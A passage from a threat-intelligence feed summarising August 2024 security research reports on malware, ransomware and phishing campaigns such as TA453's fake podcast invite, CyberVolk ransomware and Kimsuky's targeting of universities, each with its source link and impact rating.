Summary:: Researchers from Proofpoint have discovered that the Iranian threat actor TA453 is targeting a well-known religious figure by disguising a malicious attack as an invalid podcast interview invitation. This attack chain starts with a harmless email to establish confidence, followed by a malicious link that downloads a new malware toolkit called BlackSmith. This toolkit includes AnvilEcho, a PowerShell trojan that combines TA453's prior malicious features into a single script.

Source: https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering

Intel Source:: Threat Mon

Intel Name:: Diving_Deep_into_Cybervolk_Ransomware

Date of Scan:: 2024-08-20

Impact:: LOW

Summary:: CyberVolk Group, a threat actor from India and part of the Holy League with Russian ties, released CyberVolk Ransomware-as-a-Service (RaaS) on July 1, 2024. This ransomware, available for $1,000, encrypts files with the .CyberVolk extension using advanced encryption algorithms like ChaCha20-Poly1305, AES, RSA, and quantum-resistant methods.

Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/cybervolk-ransomware-technical-malware-analysis.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1723615766423.1724155304095.7&__hssc=205617164.1.1724155304095&__hsfp=1218336316

Intel Source:: Recorded Future

Intel Name:: GreenCharlie_Phishing_Activities

Date of Scan:: 2024-08-20

Impact:: MEDIUM

Summary:: Researchers from Recorded Future have identified a GreenCharlie, a group potentially acting on behalf of the Islamic Revolutionary Guard Corps (IRGC), as the source of multiple dynamic DNS domain registrations since May 2024, most likely for phishing and social engineering. This group is tied to the GORBLE malware, which targets US political candidates. It most likely utilizes ProtonVPN or ProtonMail, with Iranian IP addresses associated, indicating spearphishing attempts against research analysts, government officials, diplomats, and other high-value targets.

Source: https://go.recordedfuture.com/hubfs/reports/cta-ir-2024-0820.pdf

Intel Source:: Linkedin

Intel Name:: Brain_Cipher_Targets_CVE_2023_28252_Exploit

Date of Scan:: 2024-08-20

Impact:: MEDIUM

Summary:: The Brain Cipher Ransomware Group is suspected of exploiting CVE-2023-28252, a privilege escalation vulnerability in the Microsoft Windows CLFS driver. Previously used by the now inactive Nokowaya Ransomware Group, this exploit is being disguised under filenames like `clfs_eop.exe` to spread. The vulnerability is still available on underground markets for $5K to $25K, indicating that many systems remain unpatched and vulnerable.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_braincipher-ransomware-brain-activity-7230471679741718528-Bmbx/?utm_source=share&utm_medium=member_ios

Intel Source:: Symantec

Intel Name:: Msupedge_Backdoor_Using_DNS_in_Taiwan_Attack

Date of Scan:: 2024-08-20

Impact:: MEDIUM

Summary:: Researchers from Symantec have found a new backdoor known as 'Msupedge,' which targets a university in Taiwan. This backdoor communicates with its command and control server via DNS tunneling, a stealthy communication method. This process is based on the dnscat2 utility and allows the backdoor to receive commands using DNS name resolution.

Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/taiwan-malware-dns

Intel Source:: Cyfirma

Intel Name:: QWERTY_Info_Stealer

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: Cyfirma researchers have identified new malware called QWERTY. This malware is hosted on a Linux based server in Germany and targets both organizations and individuals. It uses advanced techniques to avoid detection and checking for the presence of debugging tools. It also gathers large amount of data from the infected system, downloads additional malicious files and sends the stolen information to a C2 server through the internet. This info Stealer has a capability to hide itself while stealing sensitive information.

Source: https://www.cyfirma.com/research/qwerty-information-stealer/

Intel Source:: CERT-AGID

Intel Name:: Quasar_RAT_Targeting_Italian_Banks

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: CERT-AGID researchers have discovered a large email spam campaign spreading the Quasar RAT malware. This campaign started in August and is targeting particularly in Italy. The emails which appear to be official communications from the Ministry of the Interior, using their logos to deceive victims. The malware version and C2 servers remain unchanged but the URLs where the malicious files are downloaded from have been updated in this campaign. This malware is specifically aimed at users of certain Italian banks.

Source: https://cert-agid.gov.it/wp-content/uploads/2024/08/BlotchyQuasar_19-08-2024.json

Intel Source:: Checkpoint

Intel Name:: Exposing_The_Styx_Stealer_Malware

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: Researchers from Check Point Research have discovered that the Styx Stealer malware can steal browser data, Telegram and Discord chats, even cryptocurrency. The developer made a mistake while debugging the malware, resulting in data leakage from his own machine. This enabled CPR to collect vital information, such as client details, profits, nicknames, phone numbers, and email addresses, as well as comparable data on the individual behind the Agent Tesla campaign.

Source: https://research.checkpoint.com/2024/unmasking-styx-stealer-how-a-hackers-slip-led-to-an-intelligence-treasure-trove/

Intel Source:: ISC.SANS

Intel Name:: Stealthy_Python_Script_Execution_via_bat_File

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: Researchers from ISC SANS have discovered a small.bat file named 3650.bat, which seemed to be harmless and had a low VirusTotal detection score. Initially, a downloaded PowerShell script retrieves and unpacks multiple ZIP archives. It then downloads the entire Python environment, including all of the libraries required to run the following stage. The next step is to download and run a Python script. The first PowerShell script is simple, but the Python script is far more complex and difficult to examine.

Source: https://isc.sans.edu/diary/rss/31182

Intel Source:: Sentinel Labs

Intel Name:: Xeon_Sender_Tool_Targets_SaaS_Credentials

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: Researchers from Sentinel Labs have found the cloud-based attack tool Xeon Sender, which is designed to assist SMS spam and phishing campaigns. This tool gives attackers a simple command-line interface to communicate with targeted service provider backends via APIs, allowing them to launch bulk SMS spam campaigns with minimal effort. Xeon enables attackers to send messages via several software-as-a-service (SaaS) providers with valid credentials.

Source: https://www.sentinelone.com/labs/xeon-sender-sms-spam-shipping-multi-tool-targeting-saas-credentials/

Intel Source:: CERT-UA

Intel Name:: SPECTR_and_FIRMACHAGEENT_Spread_via_Phishing

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: Researchers from CER-UA have discovered the phishing emails with the subject line "prisoners of war" which contained a malicious ZIP file ("spysok_kursk.zip"). This ZIP package contains a CHM file that uses JavaScript to launch a PowerShell script. This script downloads both the SPECTR malware, which steals documents, screenshots, and browser data, and the FIRMACHAGEENT malware, which uploads stolen data to a server.

Source: https://cert.gov.ua/article/6280422

Intel Source:: Cyberint

Intel Name:: UULoader_A_New_Malware_Installer

Date of Scan:: 2024-08-19

Impact:: LOW

Summary:: Cyberint researchers have discovered new malware called UULoader that targets Korean and Chinese-speaking users by pretending to be legitimate apps or updates. This malware hides by removing key file information and making it hard for security tools to detect. When the malicious installer is run, UULoader creates a hidden folder called Microsoft Thunder on the infected computer which stores hidden files there and runs a script to prevent Windows Defender from scanning it. This allows the malware to stay hidden while taking control of the system.

Source: https://cyberint.com/blog/research/meet-uuloader-an-emerging-and-evasive-malicious-installer/

Intel Source:: Aquasec

Intel Name:: Gafgyt_Malware_Exploiting_GPU_and_CNE

Date of Scan:: 2024-08-16

Impact:: MEDIUM

Summary:: Aqua Nautilus researchers have discovered a new variant of Gafgyt malware that uses the computational power of GPUs and cloud-native environments to increase its botnet and mine cryptocurrency. The variation mainly attacks machines with weak SSH passwords, and it runs two binaries directly from memory, one for transmitting the botnet and another for cryptomining.

Source: https://www.aquasec.com/blog/gafgyt-malware-variant-exploits-gpu-power-and-cloud-native-environments/

Intel Source:: Accessnow

Intel Name:: Russia_Linked_SpearPhishing_Campaigns

Date of Scan:: 2024-08-16

Impact:: MEDIUM

Summary:: Accessnow has uncovered two spear-phishing campaigns targeting Russian and Belarusian NGOs, independent media, international NGOs, and a former U.S. ambassador. One campaign is attributed to the Russia-linked group COLDRIVER (also known as STAR BLIZZARD), while the other, possibly linked to the Russian regime, has been dubbed "COLDWASTREL." These highly personalized phishing attacks involved emails from compromised or impersonated accounts with links to fake login pages designed to steal credentials. Although some targets were successfully deceived, many remained unharmed.

Source: https://www.accessnow.org/russian-phishing-campaigns/

Intel Source:: PaloAlto

Intel Name:: Env_File_Extortion

Date of Scan:: 2024-08-16

Impact:: MEDIUM

Summary:: Researchers from Unit 42 have uncovered a large-scale extortion operation targeting cloud environments by exploiting exposed environment variable files (.env files) that contained sensitive credentials for various applications. The attackers set up their infrastructure within victims' Amazon Web Services (AWS) environments and scanned over 230 million unique targets, compromising 110,000 domains and extracting over 90,000 unique variables from the .env files.

Source: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/

Intel Source:: GData

Intel Name:: Ailurophile_Stealer

Date of Scan:: 2024-08-16

Impact:: LOW

Summary:: Researchers at GData have discovered malware called Ailurophile Stealer. This malware is written in PHP and likely originates from Vietnam. It is sold through a subscription service on its own website that allow buyers to customize and create their own versions. This malware targets sensitive data from web browsers such as passwords, cookies, browsing history, and cryptocurrency wallet information. It also steals specific files based on keywords, extensions, or directories. The malware operates within a virtual environment to extract the PHP interpreter and other files directly into memory for making it hard to detect.

Source: https://www.gdatasoftware.com/blog/2024/08/38005-ailurophile-infostealer

Intel Source:: Citizen Lab

Intel Name:: COLDRIVER_Campaign

Date of Scan:: 2024-08-16

Impact:: MEDIUM

Summary:: Citizen Lab researchers have observed a sophisticated spear phishing campaign by COLDRIVER threat actor, which is attributed to the Russian Federal Security Service (FSB). It is focused on civil society members including Russian opposition figures, NGO employees and former officials in the US and Europe through customized and very persuasive social engineering hacking methods aimed at accessing online accounts.

Source: https://citizenlab.ca/2024/08/sophisticated-phishing-targets-russias-perceived-enemies-around-the-globe/

Intel Source:: Esentire

Intel Name:: D3Fack_Malware_Loader

Date of Scan:: 2024-08-16

Impact:: LOW

Summary:: Researchers at eSentire have discovered a malware called D3F@ck Loader, which is developed by an individual using the alias Sergei Panteleevich that borrowed from a notorious Russian fraudster. Sergei is active on Telegram and hacking forums. This Loader is designed to deliver other malicious software like Raccoon Stealer and MetaStealer. It first appeared in February 2024. The malware uses the Inno Setup installer, which can be manipulated to run malicious scripts to make it effective in spreading various types of malwares and maintaining persistence on infected systems.

Source: https://www.esentire.com/blog/exploring-the-d3f-ck-malware-as-a-service-loader

Intel Source:: TeamCymru

Intel Name:: Collaborative_Action_Against_FIN7

Date of Scan:: 2024-08-16

Impact:: LOW

Summary:: Researchers at Silent Push, Stark, and Team Cymru have made a collaborative effort to tackle the persistent threat posed by FIN7, a financially motivated cybercrime group active for over a decade. Despite previous interruptions, the dreaded FIN7 remains functional as according to recent Silent Push research, they discovered almost four thousand domains linked either with or imitating FIN7. Notably, most of these domains were hosted on infrastructure assigned to Stark companies. The latest analysis revealed two clusters of hypothetical FIN7 activities associated with IP addresses from Post Ltd (Russia) and Smart Ape (Estonia), along with 25 IP addresses belonging to Stark which are hosting domains related to FIN7.

Source: https://www.team-cymru.com/post/fin7-the-truth-doesn-t-need-to-be-so-stark

Intel Source:: Cyble

Intel Name:: WACC_User_Targeted_by_Havoc_Malware

Date of Scan:: 2024-08-16

Impact:: LOW

Summary:: CRIL researchers discovered a fake website that looks very similar to the official site of the World Agricultural Cycling Competition (WACC). The WACC competition is an event held in France that brings together agriculture and sports. This fake site was created in July 2024, right after the real event ended in June. The site includes a "PHOTO" section that entices visitors with the promise of event photos. However, when users download the ZIP file that supposedly contains these photos, they get a set of malicious shortcut files that start a process that installs Havoc C2 malware. This malware tries to communicate with an Azure Front Door, which likely redirects traffic to the attacker's main C2 for further malicious activities.

Source: https://cyble.com/blog/world-agricultural-cycling-competition-wacc-participants-targeted-for-havoc-c2-dissemination/

Intel Source:: sophos

Intel Name:: Unmasking_Mad_Liberator_Ransomware

Date of Scan:: 2024-08-16

Impact:: LOW

Summary:: Researchers from Sophos have discovered that the "Mad Liberator" ransomware group leverages social engineering techniques to obtain access. This group focuses on users of remote access programs such as Anydesk, which are widely used by IT teams to manage remote equipment. Sophos discovered no prior contact between the attackers and their victims before they got unsolicited Anydesk connection requests. Interestingly, the targeted users were not well-known or visible to the public, and there was no evident basis for their selection.

Source: https://news.sophos.com/en-us/2024/08/13/dont-get-mad-get-wise/

Intel Source:: Google Mandiant

Intel Name:: APT42_Update

Date of Scan:: 2024-08-15

Impact:: MEDIUM

Summary:: Google’s Threat Analysis Group (TAG) has shared details on APT42, an Iranian government-backed threat actor linked to the Islamic Revolutionary Guard Corps (IRGC), and their phishing campaigns targeting Israel and the U.S. In 2024, APT42 focused heavily on credential phishing attacks aimed at high-profile individuals, including diplomats, military officials, academics, and political figures, particularly those associated with the U.S. presidential election and Israel’s defense sector. They use social engineering techniques and phishing kits to harvest credentials through platforms like Google, Dropbox, and OneDrive. TAG has actively disrupted APT42’s activities by removing malicious infrastructure and alerting affected users. As tensions between Iran and Israel continue, APT42's phishing efforts are expected to escalate.

Source: https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phishing-campaigns-against-israel-us/

Intel Source:: Securelist

Intel Name:: Tusk_Infostealer_Campaign

Date of Scan:: 2024-08-15

Impact:: MEDIUM

Summary:: Kaspersky has uncovered a complex, multi-phase cybercriminal campaign, dubbed "Tusk", orchestrated by Russian-speaking threat actors. The campaign, involving both active and dormant sub-campaigns, mimics legitimate projects by modifying names and branding, primarily using Dropbox to host malware, such as infostealers like Danabot and StealC. The attackers leverage phishing to gather sensitive information, such as cryptocurrency wallet credentials, which they exploit for financial gain. Three active sub-campaigns were analyzed: TidyMe, RuneOnlineWorld, and Voico, each employing advanced malware-delivery mechanisms, including anti-analysis techniques, and focusing on both Windows and macOS platforms. These campaigns emphasize the actors' ability to evolve tactics rapidly, evidenced by the discovery of 16 inactive sub-campaigns, suggesting future attacks.

Source: https://securelist.com/tusk-infostealers-campaign/113367/

Intel Source:: Harfang Lab

Intel Name:: Cyclops_Malware_Platform

Date of Scan:: 2024-08-15

Impact:: MEDIUM

Summary:: Cyclops is a newly identified malware platform written in Go, believed to be a successor to the BellaCiao malware, and attributed to the "Charming Kitten" group (APT 35). Cyclops, active since December 2023, allows its operators to execute arbitrary commands, manipulate file systems, and pivot within infected networks through a REST API controlled via an SSH tunnel. It was likely deployed in the Middle East in 2024, possibly targeting servers vulnerable to exploitation. With notable overlaps in tactics, techniques, and procedures (TTPs) with BellaCiao, and associations with Iranian interests, Cyclops appears to reflect Charming Kitten’s evolving capabilities, though its limited detection suggests it may still be in early stages of use.

Source: https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/

Intel Source:: Sophos

Intel Name:: EDRKillShifter_Utility

Date of Scan:: 2024-08-15

Impact:: MEDIUM

Summary:: Sophos recently uncovered a new tool, named "EDRKillShifter," used by threat actors attempting to disable endpoint detection and response (EDR) systems during a ransomware attack involving RansomHub. While the attack failed, analysis revealed that EDRKillShifter is a loader that exploits vulnerable drivers to disable security software. The tool requires a password to decrypt embedded payloads, which then drop and exploit drivers to gain system privileges and terminate security processes. EDRKillShifter is part of a broader trend of EDR killers and uses techniques such as self-modifying code and Go-based obfuscation to evade detection. The final payloads vary by incident, and the tool may have been acquired from dark net marketplaces.

Source: https://news.sophos.com/en-us/2024/08/14/edr-kill-shifter/

Intel Source:: FortiGuard Labs

Intel Name:: New_ValleyRAT_Campaign

Date of Scan:: 2024-08-15

Impact:: LOW

Summary:: FortiGuard Labs has uncovered an ongoing ValleyRAT malware campaign targeting Chinese-speaking users, primarily focusing on Windows systems. Historically aimed at sectors such as e-commerce and finance, ValleyRAT employs multi-stage attacks using shellcode to evade detection by executing components directly in memory, minimizing its file footprint. The campaign involves techniques like masquerading as legitimate financial documents and employing sandbox evasion tactics. The malware uses a beaconing module to connect with a command and control (C2) server, allowing attackers to load additional components, gain administrator privileges, and monitor the victim’s activities. It also targets specific Chinese antivirus software to disable defenses.

Source: https://www.fortinet.com/blog/threat-research/valleyrat-campaign-targeting-chinese-speakers

Intel Source:: MalwareBytes

Intel Name:: Malicious_Google_Search_Ads

Date of Scan:: 2024-08-15

Impact:: LOW

Summary:: Malwarebytes has uncovered a new scam campaign in which cybercriminals are using malicious search ads to impersonate multiple Google products, including Google Authenticator and Google Maps, to distribute malware. The attackers redirect victims to a fake Google homepage via Google's Looker Studio, which is misused to display an image designed to resemble the real Google search page. When victims interact with this fake page, they are redirected to a tech support scam site that locks their browser and displays fake Microsoft or Apple alerts, pressuring them into calling a number for assistance. The scammers then attempt to defraud victims by persuading them to buy gift cards or log into their bank accounts. This campaign is particularly dangerous as the scammers rotate malicious URLs through Microsoft Azure’s infrastructure, making conventional blocking efforts difficult.

Source: https://www.malwarebytes.com/blog/scams/2024/08/dozens-of-google-products-targeted-by-scammers-via-malicious-search-ads

Intel Source:: Elastic Security Labs

Intel Name:: Banshee_Infostealer

Date of Scan:: 2024-08-15

Impact:: LOW

Summary:: BANSHEE Stealer is a new macOS malware developed by Russian threat actors targeting both x86_64 and ARM64 architectures. This high-priced malware, at $3,000 per month, is capable of stealing extensive system data, browser credentials, and cryptocurrency wallets, with a focus on macOS systems. It employs basic techniques for anti-debugging and virtual machine detection, collects files from various locations, and even uses phishing tactics to steal user passwords. BANSHEE Stealer targets nine popular browsers, around 100 browser extensions, and several cryptocurrency wallets.

Source: https://www.elastic.co/security-labs/beyond-the-wail

Intel Source:: PaloAlto

Intel Name:: Similarities_Between_Tokyo_And_Paris_Olympics

Date of Scan:: 2024-08-14

Impact:: LOW

Summary:: Researchers at Palo Alto have discovered that scam and phishing domains linked to the Tokyo 2021 Summer Olympics are also connected to the Paris 2024 Summer Olympics. This suggests that the same threat actors are targeting Olympic events by using domains. Interestingly, the 2020 Olympics, which were delayed to 2021 because of the COVID-19 pandemic, led to the creation of domains with 2021 in their names. The analysis shows that these malicious domains are using the same IP addresses across different Olympic years.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-12-Olympic-themed-domains-similar-infrastructure-2020-and-2024.txt

Intel Source:: Recorded Future

Intel Name:: Malicious_Activity_Intensify_for_2024_US_Elections

Date of Scan:: 2024-08-14

Impact:: MEDIUM

Summary:: The forthcoming US 2024 elections are being shadowed by intensified influence operations from external and internal actors. Russia, China, and Iran each have their own techniques in manipulating election processes like using social media as well as posing as America-based news outlets. Meanwhile, Russia’s Doppelganger network and China’s Empire Dragon are trying to exploit public opinion through these platforms to the point of amplifying controversies but with only few results.

Source: https://go.recordedfuture.com/hubfs/reports/ta-2024-0813.pdf

Intel Source:: ISC.SANS

Intel Name:: Analysis_of_Malware_Delivered_via_MSI_Package

Date of Scan:: 2024-08-14

Impact:: LOW

Summary:: Researchers from ISC SANS have observed the numerous malware samples transmitted via an MSI package. During their study, they discovered a low detection score on VirusTotal. However, when they attempted to install the program in their sandbox environment, they received an error message: "This package can only be run from a bootstrapper." This issue usually happens while uninstalling or updating a package that contains an EXE file, particularly in multilingual products that include a show language selection window. It is a known problem, frequently caused by separate language installations with distinct Product Codes.

Source: https://isc.sans.edu/diary/rss/31168

Intel Source:: Securelist

Intel Name:: A_Deep_Dive_into_Twelve_Group

Date of Scan:: 2024-08-14

Impact:: LOW

Summary:: Researchers at Securelist have identified a group called Twelve which formed in 2023 during the Russian-Ukrainian conflict. This group targets Russian state-owned companies with the aim of causing significant harm by encrypting and deleting data. Twelve uses publicly available tools instead of creating their own. They perform reconnaissance to find vulnerabilities, then use tools like ngrok, Cobalt Strike, and PowerShell to infiltrate and maintain access to systems. Twelve isn't interested in ransom. They prefer to encrypt data and then use wipers to make recovery impossible. Their motive appears to be causing harm rather than achieving financial gain.

Source: https://securelist.ru/twelve-group-unified-kill-chain/110128/

Intel Source:: Cyble

Intel Name:: Cryptocurrency_Lures_and_Pupy_RAT

Date of Scan:: 2024-08-14

Impact:: LOW

Summary:: CRIL researchers have uncovered a campaign in which a threat actor called UTG-Q-010 is targeting cryptocurrency enthusiasts and HR departments using a Windows shortcut (LNK) file in phishing emails. This group is believed to be from East Asia and is primarily involved in financially motivated attacks. They use social engineering tactics, such as pretending to offer job resumes or a fictional cryptocurrency event called Michelin Night to trick victims into opening malicious attachments. Their motive is to deploy a powerful remote access tool called Pupy RAT to control the compromised system.

Source: https://cyble.com/blog/analysing-the-utg-q-010-campaign/

Intel Source:: The Dreaming Bluebird

Intel Name:: North_Korean_Malware_Disguised_as_CHM_Document

Date of Scan:: 2024-08-14

Impact:: LOW

Summary:: A recent security alert highlights a malware attack involving a CHM file titled "240903-National Assembly (regular) 1st Plenary Session Agenda (Settlement of Accounts, Proposal of Agenda, Report on Current Issues) 2024.8.11," created by the North Korean hacking group Kimsuky. The file named as National Assembly agenda document is meant for targeting South Korean National Assembly members and aides. Once the file is open, PowerShell commands are automatically executed by this undetectable malware from most antivirus software programs.

Source: https://wezard4u.tistory.com/429252

Intel Source:: CloudSek and Juniper

Intel Name:: Indian_Banks_Targeted_by_RansomEXX

Date of Scan:: 2024-08-14

Impact:: LOW

Summary:: CloudSek and Juniper researchers have identified a ransomware attack that is disrupting the Indian banking ecosystem. This attack has targeted Brontoo Technology Solutions a joint venture between Tata Consultancy Services (TCS) and the State Bank of India (SBI). The group behind this attack is RansomEXX, active since 2018 and known for targeting government organizations, banks and other sectors. The attack starts with a misconfigured Jenkins server where the attackers exploit a vulnerability known as CVE-2024-23897. This vulnerability allows attackers to gain unauthorized access, leading to the ransomware attack that severely impacts banking operations

Source: https://blogs.juniper.net/en-us/threat-research/cve-2024-23897-enabled-ransomware-attack-on-indian-banks https://www.cloudsek.com/blog/major-payment-disruption-ransomware-strikes-indian-banking-infrastructure

Intel Source:: LinkedIn

Intel Name:: Allarich_Ransomware

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: A new ransomware called Allarich has emerged into the ransomware landscape. This ransomware encrypts files by adding Allarich extension to them and changes the desktop wallpaper.

Source: https://www.linkedin.com/feed/update/urn:li:activity:7229102181918896128/

Intel Source:: ReliaQuest

Intel Name:: New_Malware_Trends

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: Researchers from the ReliaQuest have observed that SocGholish, GootLoader, and Raspberry Robin are among the most common malware found in critical security incidents. These loaders are increasingly leveraging scripts like Python to deliver additional malware, such as ransomware, which improves evasion and persistence. This shift reflects a larger trend away from easily identifiable executables and PowerShell scripts and toward more stealthy techniques.

Source: https://www.reliaquest.com/blog/common-malware-loaders/

Intel Source:: Medium (jazkiller2432)

Intel Name:: APT_Groups_Targeting_Russian_Government

Date of Scan:: 2024-08-13

Impact:: MEDIUM

Summary:: The analysis provides a series of sophisticated malware campaigns by state-sponsored APT groups targeting Russian government agencies and IT firms. These use complicated malware like CMoon worm that spreads via USB drives and executes using CMD.EXE, as well as GrewApacha backdoor that takes advantage of DLL side-loading to maintain persistence. Attacks comprise spear-phishing, system vulnerabilities exploitation, and cloud services abuse for their command and control infrastructure. Some features of this malware include advanced ones such as data exfiltration, remote-control, evasive techniques among others which constitute serious threats to the security of the targeted systems.

Source: https://medium.com/@jazkiller2432/state-sponsored-apt-groups-target-russian-government-and-it-firms-with-sophisticated-malware-3a8df40cb0e2

Intel Source:: Linkedin

Intel Name:: Lock_System_Ransomware

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: A new ransomware strain named Lock System has recently surfaced in the ransomware landscape. This ransomware encrypts the victim's files and demands a ransom of 1 Bitcoin (BTC) for their release.

Source: https://www.linkedin.com/posts/chethan-mj-5a52bb254_cti-cybersecurity-security-activity-7227565615895470080-ivRF/?utm_source=share&utm_medium=member_ios

Intel Source:: Netskope

Intel Name:: The_Examination_of_Play_Ransomware

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: Netskope researchers have analyzed the Play ransomware, also known as PlayCrypt, that emerged in June 2022 and has affected Latin America, Europe, and North America’s healthcare and telecommunication sectors. This ransomware steals network access via compromised accounts or exploits vulnerabilities before using post-exploitation tools such as Bloodhound, PsExec, Mimikatz, AdFind. This is done by using Return-oriented Programming (ROP), junk code insertion, Structured Exception Handling (SEH) abuse, string obfuscation and API hashing which make it hard to detect and analyze this sophisticated anti-analysis technique.

Source: https://www.netskope.com/blog/replay-revisiting-play-ransomware-anti-analysis-techniques

Intel Source:: CERT-UA

Intel Name:: UAC_0198_targets_government_entities_of_Ukraine

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: Researchers at CERT-UA have discovered a phishing campaign where UAC-0198 is distributing emails on behalf of the Security Service of Ukraine with a link to download a file named Documents.zip. However, instead of legitimate documents, this link downloads an MSI file and when the user opens this file it installs malware called ANONVNC which enables unauthorized access to the infected system. Over 100 computers, including those within the Ukrainian government and local authorities have been affected by this malware.

Source: https://cert.gov.ua/article/6280345

Intel Source:: Slientpush

Intel Name:: AnyDesk_Campaign_Targets_UK_Banks

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: Silent Push researchers have uncovered a campaign where attackers are using spoofed websites, social engineering, and phishing tactics to trick Windows and macOS users into downloading a copy of the AnyDesk remote access software. Once the threat actor has access to a victim’s machine, they can perform various attacks such as stealing data, committing financial fraud and accessing bank accounts. The campaign targets brands like UK banks (HSBC, Natwest, Lloyds, Santander, Virgin Money), antivirus companies like Avast and cryptocurrency wallet provider Ledger. These fake sites closely resemble legitimate brand websites to make the scam more convincing.

Source: https://www.silentpush.com/blog/anydesk/

Intel Source:: Rapid7

Intel Name:: Social_Engineering_Campaign

Date of Scan:: 2024-08-13

Impact:: LOW

Summary:: Rapid7 researchers have uncovered a social engineering campaign where attackers use email bombs and follow-up phone calls often through MS Teams to trick users into downloading AnyDesk, a remote access tool that allows them to take control of the victim's machine. Once the attacker gains access to the victim’s machine then they use this access to upload and execute payloads to exfiltrate data. They also use a fake program called AntiSpam.exe to trick users into entering their credentials for future use. Additionally, the attackers deploy various payloads, including SystemBC malware and other tools to establish connections with their C2 servers and escalate privileges within the system.

Source: https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-campaign-refreshes-payloads/

Intel Source:: Securlist

Intel Name:: EastWind_Campaign

Date of Scan:: 2024-08-12

Impact:: MEDIUM

Summary:: Securelist researchers have discovered an ongoing campaign of targeted cyberattacks on dozens of machines belonging to Russian government organizations and IT companies. The attacks are initiated through phishing emails containing malicious shortcut files. Once clicked, these shortcuts installed malware that communicated with the attackers via Dropbox, allowing them to deploy additional Trojans and tools used by the APT31 cyber group, including an updated CloudSorcerer backdoor, named this campaign EastWind.

Source: https://securelist.ru/eastwind-apt-campaign/110020/

Intel Source:: The DFIR Report

Intel Name:: Hackers_Leveraging_Sliver_PoshC2_and_Batch_Scripts

Date of Scan:: 2024-08-12

Impact:: MEDIUM

Summary:: Researchers at the DFIR report have eximened an open directory associated with IP address 94[.]198[.]53[.]143, first identified on December 10, 2023. Initially flagged for PoshC2 command-and-control activity since September 21, 2023, this infrastructure has been intermittently active, with the most recent activity on August 11, 2024. The attacker used a variety of scripts and malware to attack both Windows and Linux systems, including batch scripts for deleting backups, disabling security features, and removing logs. Also, Ngrok and SystemBC malware were used in the process.

Source: https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#iocs

Intel Source:: ReasonLabs

Intel Name:: Exposing_a_New_Polymorphic_Malware_Campaign

Date of Scan:: 2024-08-12

Impact:: LOW

Summary:: Researchers from The ReasonLabs Research Team have observed a huge malware operation that installs unwanted extensions on devices. This trojan software includes everything from simple adware that hijacks searches to more complicated scripts that may collect personal information and perform malicious commands.

Source: https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign

Intel Source:: Linkedin

Intel Name:: Fog_Ransomware

Date of Scan:: 2024-08-12

Impact:: LOW

Summary:: Fog Ransomware, first detected in June 2024, is a Visual C++ coded malware targeting Windows systems. It primarily affects the education sector, with the U.S. being the most impacted country, though other industries and countries are also affected. Fog encrypts files, appending them with the extensions .fog and .flocked. The ransomware is linked to various other ransomware families and uses tools and techniques common among these groups, such as SharpShares for network discovery and Veeam-Get-Creds.ps1 for credential theft. The Dark Web site used by the attackers is built with Astro, a content-driven web framework. While a list of victims is known, their data has not yet appeared on the site.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_fog-ransomware-malware-activity-7227574275925295104-XbBh/?utm_source=share&utm_medium=member_ios

Intel Source:: Fortinet

Intel Name:: PureHVNC_Deployed_in_Multi_Malware_Attack

Date of Scan:: 2024-08-09

Impact:: LOW

Summary:: FortiGuard Labs researchers have discovered a sophisticated attack that uses a variety of evasion techniques. The attack begins with a fake email that tricked victims into downloading a malicious attachment. This attachment initiates the installation of many malware programs, including VenomRAT, XWorm, AsyncRAT, and PureHVNC. To escape detection, attackers use advanced tactics such as Python-based obfuscators and specialized tools.

Source: https://www.fortinet.com/blog/threat-research/purehvnc-deployed-via-python-multi-stage-loader

Intel Source:: Esentire

Intel Name:: Ande_Loader_Causes_0bj3ctivity_Stealer_Infection

Date of Scan:: 2024-08-09

Impact:: LOW

Summary:: Researchers at eSentire have discovered a phishing attack that led to an infection with the 0bj3ctivity Stealer malware. The incident began when a user clicked on a malicious Discord CDN link, resulting in the download of a JavaScript file called Enquiry-Dubai.js. This file was created to retrieve and run additional malicious payloads, including the Ande Loader and the 0bj3ctivity Stealer.

Source: https://www.esentire.com/blog/ande-loader-leads-to-0bj3ctivity-stealer-infection

Intel Source:: Trend Micro

Intel Name:: Earth_Baku_Targets_Europe_and_MEA

Date of Scan:: 2024-08-09

Impact:: LOW

Summary:: Researchers from Trend Micro have revealed that the current campaign 'Earth Baku' has expanded its activities outside the Indo-Pacific area to Europe, the Middle East, and Africa, targeting nations such as Italy, Germany, the UAE, and Qatar, with suspected threat activity in Georgia and Romania. The organization using public-facing programs, such as IIS servers, as entry points, deploying complex malware toolkits such the Godzilla webshell, StealthVector, StealthReacher, and SneakCros.

Source: https://www.trendmicro.com/en_us/research/24/h/earth-baku-latest-campaign.html

Intel Source:: Resilience

Intel Name:: Kimsuky_Targets_University_Researchers

Date of Scan:: 2024-08-09

Impact:: LOW

Summary:: Resilience researchers have uncovered that the North Korean threat group Kimsuky is targeting university staff, researchers, and professors to steal research and intelligence for the North Korean government, aligning with the goals of the Reconnaissance General Bureau (RGB), the country’s main intelligence agency. They are using a webshell called Green Dinosaur on compromised servers to control them and create phishing websites that mimic the real login pages of institutions like Dongduk University, Korea University, and Yonsei University.

